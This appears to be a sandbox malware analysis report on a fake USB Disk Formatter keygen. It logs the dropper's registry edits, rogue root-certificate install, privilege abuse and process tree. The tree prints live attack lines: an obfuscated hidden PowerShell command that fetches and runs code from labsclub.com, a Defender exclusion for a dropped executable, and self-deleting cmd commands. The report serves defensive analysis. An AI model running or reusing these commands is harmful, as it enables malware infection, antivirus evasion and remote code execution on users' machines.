Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Privacy	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\MigrationTime = 6c3a3b6c55add601	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url3 = "https://signin.ebay.com/ws/ebayisapi.dll"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory\UUID = "{204B7251-4970-4F8B-9B0B-3B7282C38EA8}"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\AllComplete = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\AdapterInfo = "vendorId=\"0x1414\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.15063.0\"hypervisor=\"No Hypervisor (No SLAT)\""	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CacheLimit = "1"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\Extensions	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DeviceId = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionHigh = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Zoom	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = 010000003480cf7626ee613aca31b81ed9c5bc213cf1081119abc60073c996c4238a3a1c07f3b2d779b48d1ce57df96e04fde63e33eba3ba87ddd2874dd193107892734ef37b1fcf113be71a1f88c819effdc94fe58997495a2194acb3a651e77f3388c54e395b16da23055ba76faaba1167095990ed93311316288f8a68c27e250d4b1c544b4427c70c5c906e54312579d956e958365d5abb5bdabefb37824f6ac0da759dd2c0f9a196a9c28d553e89d7f481351384f9c62692504ba933d8dfb1ebfe1cd3ee62103a627c2b499492de2f591dc9a9f617884d5abae98f7c7858ec305bc21dc05cd47d0e4e1e4430782bf4a628c3f1ae5003b3521025aa32feeec52eaa407466e342673b9e068e48b20f6d7df3a508cb6684611c76a09d75c31fda8515f19201eae8e689566c71fe9d5ce27ca5b32d6d73237057b36adb65bbb3f6d595943bb2d62e8a98ff15ed702bc288448de06bb459faffa21e61b022879a0ebe94c86a973ff790089c2b6bc089512a76f64eb5bf9fa6369feea1b8ccfe9317e02c0ee7d1c48a727af878cd0c63cdc4b07c5a9ab0cc21f5ec700ba8d7ded30ef42b14aab78ff41ce8	MicrosoftEdge.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	askinstall20.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	askinstall20.exe

Runs ping.exe 1 TTPs 5 IoCs

Remote System Discovery

T1018

pid	Process
9112	PING.EXE
2548	PING.EXE
2108	PING.EXE
5888	PING.EXE
5712	PING.EXE

Script User-Agent 11 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	79	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	86	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	245	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	511	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	586	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	76	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	239	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	448	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	452	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	506	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	590	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 19 IoCs

pid	Process
4580	setups.tmp
4580	setups.tmp
2908	multitimer.exe
2908	multitimer.exe
2908	multitimer.exe
2908	multitimer.exe
2908	multitimer.exe
2908	multitimer.exe
2908	multitimer.exe
2908	multitimer.exe
2908	multitimer.exe
1044	IBInstaller_97039.tmp
1044	IBInstaller_97039.tmp
1976	vpn.tmp
1976	vpn.tmp
1976	vpn.tmp
1976	vpn.tmp
2196	qye1epee4zr.tmp
2196	qye1epee4zr.tmp

Suspicious use of AdjustPrivilegeToken 50 IoCs

description	pid	Process
Token: SeDebugPrivilege	1736	Setup.exe
Token: SeCreateTokenPrivilege	4508	askinstall20.exe
Token: SeAssignPrimaryTokenPrivilege	4508	askinstall20.exe
Token: SeLockMemoryPrivilege	4508	askinstall20.exe
Token: SeIncreaseQuotaPrivilege	4508	askinstall20.exe
Token: SeMachineAccountPrivilege	4508	askinstall20.exe
Token: SeTcbPrivilege	4508	askinstall20.exe
Token: SeSecurityPrivilege	4508	askinstall20.exe
Token: SeTakeOwnershipPrivilege	4508	askinstall20.exe
Token: SeLoadDriverPrivilege	4508	askinstall20.exe
Token: SeSystemProfilePrivilege	4508	askinstall20.exe
Token: SeSystemtimePrivilege	4508	askinstall20.exe
Token: SeProfSingleProcessPrivilege	4508	askinstall20.exe
Token: SeIncBasePriorityPrivilege	4508	askinstall20.exe
Token: SeCreatePagefilePrivilege	4508	askinstall20.exe
Token: SeCreatePermanentPrivilege	4508	askinstall20.exe
Token: SeBackupPrivilege	4508	askinstall20.exe
Token: SeRestorePrivilege	4508	askinstall20.exe
Token: SeShutdownPrivilege	4508	askinstall20.exe
Token: SeDebugPrivilege	4508	askinstall20.exe
Token: SeAuditPrivilege	4508	askinstall20.exe
Token: SeSystemEnvironmentPrivilege	4508	askinstall20.exe
Token: SeChangeNotifyPrivilege	4508	askinstall20.exe
Token: SeRemoteShutdownPrivilege	4508	askinstall20.exe
Token: SeUndockPrivilege	4508	askinstall20.exe
Token: SeSyncAgentPrivilege	4508	askinstall20.exe
Token: SeEnableDelegationPrivilege	4508	askinstall20.exe
Token: SeManageVolumePrivilege	4508	askinstall20.exe
Token: SeImpersonatePrivilege	4508	askinstall20.exe
Token: SeCreateGlobalPrivilege	4508	askinstall20.exe
Token: 31	4508	askinstall20.exe
Token: 32	4508	askinstall20.exe
Token: 33	4508	askinstall20.exe
Token: 34	4508	askinstall20.exe
Token: 35	4508	askinstall20.exe
Token: SeDebugPrivilege	2908	multitimer.exe
Token: SeDebugPrivilege	1072	MicrosoftEdge.exe
Token: SeDebugPrivilege	1072	MicrosoftEdge.exe
Token: SeDebugPrivilege	1072	MicrosoftEdge.exe
Token: SeDebugPrivilege	1072	MicrosoftEdge.exe
Token: SeDebugPrivilege	4732	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	4732	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	4732	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	4732	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	1072	MicrosoftEdge.exe
Token: SeDebugPrivilege	3568	multitimer.exe
Token: SeDebugPrivilege	1976	vpn.tmp
Token: SeDebugPrivilege	1976	vpn.tmp
Token: SeDebugPrivilege	748	taskkill.exe
Token: SeSecurityPrivilege	2860	client32.exe

Suspicious use of FindShellTrayWindow 38 IoCs

pid	Process
196	Setup3310.tmp
1044	IBInstaller_97039.tmp
1976	vpn.tmp
2196	qye1epee4zr.tmp
2860	client32.exe
1976	vpn.tmp
1976	vpn.tmp
1976	vpn.tmp
1976	vpn.tmp
1976	vpn.tmp
1976	vpn.tmp
1976	vpn.tmp
1976	vpn.tmp
1976	vpn.tmp
1976	vpn.tmp
1976	vpn.tmp
1976	vpn.tmp
1976	vpn.tmp
1976	vpn.tmp
1976	vpn.tmp
1976	vpn.tmp
1976	vpn.tmp
1976	vpn.tmp
1976	vpn.tmp
1976	vpn.tmp
1976	vpn.tmp
1976	vpn.tmp
1976	vpn.tmp
1976	vpn.tmp
1976	vpn.tmp
1976	vpn.tmp
1976	vpn.tmp
1976	vpn.tmp
1976	vpn.tmp
1976	vpn.tmp
1976	vpn.tmp
1976	vpn.tmp
1976	vpn.tmp

Suspicious use of SetWindowsHookEx 19 IoCs

pid	Process
3096	setups.exe
4580	setups.tmp
1072	MicrosoftEdge.exe
2212	MicrosoftEdgeCP.exe
2212	MicrosoftEdgeCP.exe
3100	qye1epee4zr.exe
2196	qye1epee4zr.tmp
4068	cpyrix.exe
4440	vpn.exe
4416	vict.exe
2516	Setup3310.exe
1976	vpn.tmp
196	Setup3310.tmp
192	vict.tmp
2288	IBInstaller_97039.exe
1044	IBInstaller_97039.tmp
2200	winlthsth.exe
2860	client32.exe
204	Setup.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4636 wrote to memory of 4172	4636	Usb_Disk_Formatter_3_2_5_keygen_by_KeygenNinja.exe	78
PID 4636 wrote to memory of 4172	4636	Usb_Disk_Formatter_3_2_5_keygen_by_KeygenNinja.exe	78
PID 4636 wrote to memory of 4172	4636	Usb_Disk_Formatter_3_2_5_keygen_by_KeygenNinja.exe	78
PID 4172 wrote to memory of 3048	4172	cmd.exe	81
PID 4172 wrote to memory of 3048	4172	cmd.exe	81
PID 4172 wrote to memory of 3048	4172	cmd.exe	81
PID 4172 wrote to memory of 528	4172	cmd.exe	82
PID 4172 wrote to memory of 528	4172	cmd.exe	82
PID 4172 wrote to memory of 528	4172	cmd.exe	82
PID 4172 wrote to memory of 828	4172	cmd.exe	83
PID 4172 wrote to memory of 828	4172	cmd.exe	83
PID 4172 wrote to memory of 828	4172	cmd.exe	83
PID 4172 wrote to memory of 1636	4172	cmd.exe	84
PID 4172 wrote to memory of 1636	4172	cmd.exe	84
PID 4172 wrote to memory of 1636	4172	cmd.exe	84
PID 3048 wrote to memory of 4364	3048	keygen-pr.exe	85
PID 3048 wrote to memory of 4364	3048	keygen-pr.exe	85
PID 3048 wrote to memory of 4364	3048	keygen-pr.exe	85
PID 1636 wrote to memory of 1736	1636	keygen-step-4.exe	86
PID 1636 wrote to memory of 1736	1636	keygen-step-4.exe	86
PID 828 wrote to memory of 4412	828	keygen-step-3.exe	87
PID 828 wrote to memory of 4412	828	keygen-step-3.exe	87
PID 828 wrote to memory of 4412	828	keygen-step-3.exe	87
PID 4364 wrote to memory of 2312	4364	key.exe	89
PID 4364 wrote to memory of 2312	4364	key.exe	89
PID 4364 wrote to memory of 2312	4364	key.exe	89
PID 4412 wrote to memory of 2548	4412	cmd.exe	90
PID 4412 wrote to memory of 2548	4412	cmd.exe	90
PID 4412 wrote to memory of 2548	4412	cmd.exe	90
PID 1736 wrote to memory of 2908	1736	Setup.exe	91
PID 1736 wrote to memory of 2908	1736	Setup.exe	91
PID 1736 wrote to memory of 3096	1736	Setup.exe	92
PID 1736 wrote to memory of 3096	1736	Setup.exe	92
PID 1736 wrote to memory of 3096	1736	Setup.exe	92
PID 1636 wrote to memory of 4508	1636	keygen-step-4.exe	93
PID 1636 wrote to memory of 4508	1636	keygen-step-4.exe	93
PID 1636 wrote to memory of 4508	1636	keygen-step-4.exe	93
PID 3096 wrote to memory of 4580	3096	setups.exe	94
PID 3096 wrote to memory of 4580	3096	setups.exe	94
PID 3096 wrote to memory of 4580	3096	setups.exe	94
PID 2908 wrote to memory of 1248	2908	multitimer.exe	100
PID 2908 wrote to memory of 1248	2908	multitimer.exe	100
PID 1248 wrote to memory of 3568	1248	multitimer.exe	101
PID 1248 wrote to memory of 3568	1248	multitimer.exe	101
PID 3568 wrote to memory of 4296	3568	multitimer.exe	102
PID 3568 wrote to memory of 4296	3568	multitimer.exe	102
PID 3568 wrote to memory of 4296	3568	multitimer.exe	102
PID 3568 wrote to memory of 3100	3568	multitimer.exe	103
PID 3568 wrote to memory of 3100	3568	multitimer.exe	103
PID 3568 wrote to memory of 3100	3568	multitimer.exe	103
PID 3568 wrote to memory of 4068	3568	multitimer.exe	105
PID 3568 wrote to memory of 4068	3568	multitimer.exe	105
PID 3100 wrote to memory of 2196	3100	qye1epee4zr.exe	104
PID 3100 wrote to memory of 2196	3100	qye1epee4zr.exe	104
PID 3100 wrote to memory of 2196	3100	qye1epee4zr.exe	104
PID 3568 wrote to memory of 4416	3568	multitimer.exe	106
PID 3568 wrote to memory of 4416	3568	multitimer.exe	106
PID 3568 wrote to memory of 4416	3568	multitimer.exe	106
PID 3568 wrote to memory of 4440	3568	multitimer.exe	107
PID 3568 wrote to memory of 4440	3568	multitimer.exe	107
PID 3568 wrote to memory of 4440	3568	multitimer.exe	107
PID 3568 wrote to memory of 2516	3568	multitimer.exe	108
PID 3568 wrote to memory of 2516	3568	multitimer.exe	108
PID 3568 wrote to memory of 2516	3568	multitimer.exe	108

C:\Users\Admin\AppData\Local\Temp\Usb_Disk_Formatter_3_2_5_keygen_by_KeygenNinja.exe
"C:\Users\Admin\AppData\Local\Temp\Usb_Disk_Formatter_3_2_5_keygen_by_KeygenNinja.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4636
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4172
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
    keygen-pr.exe -p83fsase3Ge
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:3048
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:4364
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
        5⤵
        
        PID:2312
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
    keygen-step-1.exe
    3⤵
    - Executes dropped EXE
    PID:528
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
    keygen-step-3.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:828
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4412
    - - C:\Windows\SysWOW64\PING.EXE
        
        ping 1.1.1.1 -n 1 -w 3000
        5⤵
        Runs ping.exe
        
        PID:2548
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
    keygen-step-4.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:1636
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1736
    - - C:\Users\Admin\AppData\Local\Temp\3ZVGN1LBQ5\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3ZVGN1LBQ5\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
        5⤵
        Executes dropped EXE
        Maps connected drives based on registry
        Drops file in Windows directory
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2908
      - C:\Users\Admin\AppData\Local\Temp\3ZVGN1LBQ5\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3ZVGN1LBQ5\multitimer.exe" 1 3.1617536605.6069a65d122d8 101
        6⤵
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of WriteProcessMemory
        
        PID:1248
        
        C:\Users\Admin\AppData\Local\Temp\3ZVGN1LBQ5\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3ZVGN1LBQ5\multitimer.exe" 2 3.1617536605.6069a65d122d8
        7⤵
        Executes dropped EXE
        Checks for any installed AV software in registry
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3568
        
        C:\Users\Admin\AppData\Local\Temp\03p2hjzn2qr\my1kbeltbcj.exe
        
        "C:\Users\Admin\AppData\Local\Temp\03p2hjzn2qr\my1kbeltbcj.exe"
        8⤵
        Executes dropped EXE
        
        PID:4296
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\03p2hjzn2qr\my1kbeltbcj.exe"
        9⤵
        
        PID:4400
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 1.1.1.1 -n 1 -w 3000
        10⤵
        Runs ping.exe
        
        PID:2108
        
        C:\Users\Admin\AppData\Local\Temp\nyvizyup32k\qye1epee4zr.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nyvizyup32k\qye1epee4zr.exe" /VERYSILENT
        8⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:3100
        
        C:\Users\Admin\AppData\Local\Temp\is-6B17A.tmp\qye1epee4zr.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-6B17A.tmp\qye1epee4zr.tmp" /SL5="$500EA,2592217,780800,C:\Users\Admin\AppData\Local\Temp\nyvizyup32k\qye1epee4zr.exe" /VERYSILENT
        9⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Program Files directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SetWindowsHookEx
        
        PID:2196
        
        C:\Users\Admin\AppData\Local\Temp\is-45MPA.tmp\winlthsth.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-45MPA.tmp\winlthsth.exe"
        10⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:2200
        
        C:\Users\Admin\AppData\Local\Temp\DHalPWPWt.exe
        
        "C:\Users\Admin\AppData\Local\Temp\DHalPWPWt.exe"
        11⤵
        
        PID:6644
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
        11⤵
        
        PID:348
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
        12⤵
        
        PID:2832
        
        C:\Users\Admin\AppData\Local\Temp\buosw2rczxb\cpyrix.exe
        
        "C:\Users\Admin\AppData\Local\Temp\buosw2rczxb\cpyrix.exe" /VERYSILENT
        8⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:4068
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        C:\Users\Admin\AppData\Roaming\1.exe
        9⤵
        Executes dropped EXE
        
        PID:2188
        
        C:\Users\Admin\AppData\Local\Temp\0f184e75-a6ed-429c-9d89-0e5d7fe1ab1f\AdvancedRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\0f184e75-a6ed-429c-9d89-0e5d7fe1ab1f\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\0f184e75-a6ed-429c-9d89-0e5d7fe1ab1f\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
        10⤵
        
        PID:5340
        
        C:\Users\Admin\AppData\Local\Temp\0f184e75-a6ed-429c-9d89-0e5d7fe1ab1f\AdvancedRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\0f184e75-a6ed-429c-9d89-0e5d7fe1ab1f\AdvancedRun.exe" /SpecialRun 4101d8 5340
        11⤵
        
        PID:376
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\1.exe" -Force
        10⤵
        
        PID:1692
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c timeout 1
        10⤵
        
        PID:6060
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 1
        11⤵
        Delays execution with timeout.exe
        
        PID:5672
        
